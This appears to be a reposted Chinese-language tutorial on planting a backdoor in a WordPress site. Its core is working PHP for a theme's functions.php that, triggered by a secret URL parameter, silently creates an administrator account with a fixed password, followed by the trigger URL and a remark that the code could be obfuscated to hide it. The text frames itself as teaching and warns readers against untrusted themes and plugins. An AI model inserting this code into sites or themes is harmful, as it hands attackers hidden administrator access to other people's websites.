溫馨提示:易賢網(wǎng)小編為您整理了“WordPress 教程:如何在 WordPress 站點(diǎn)創(chuàng)建后門”,方便廣大網(wǎng)友查閱�!
是不是在很多場合聽說過后門(Backdoor),特別是一些高科技的電影里面��,那些系統(tǒng)或者程序的作者都會(huì)通過自己留下的后門來拯救世界���。其實(shí)程序的后門留我們根本不遠(yuǎn)����,其實(shí)你用的很多軟件或者程序都是有后門的���,下面給大家演示的一個(gè)很簡單的案例�����,就可以給 WordPress 站點(diǎn)留下后門��,獲取管理員權(quán)限,當(dāng)然這只是一篇教學(xué)文章�,個(gè)人強(qiáng)烈你在使用 WordPress 幫人作網(wǎng)站的時(shí)候,千萬不要這樣做�����。
<?php
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
比如在主題的 functions.php 文件中添加以上代碼,就可以給 WordPress 添加一個(gè)能夠創(chuàng)建管理員的后門����,只需訪問 http://www.yoursitename.com/?backdoor=go,然后就創(chuàng)建了一個(gè)用戶名為“backdoor”���,密碼為:“pa55w0rd!” 的管理員�����。
如果在把上面這段代碼加密一下�,很多用戶就根本不知道這段代碼是做什么的���,所以強(qiáng)烈建議大家不要隨便去下載一些來路不明的 WordPress 主題和插件����,說不定就給你的站點(diǎn)安裝了一個(gè)后門�����。
更多信息請查看IT技術(shù)專欄
由于各方面情況的不斷調(diào)整與變化�����,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考,敬請考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)�!
公眾號
事業(yè)單位
當(dāng)前位置:
公考類
招聘類
各類考試
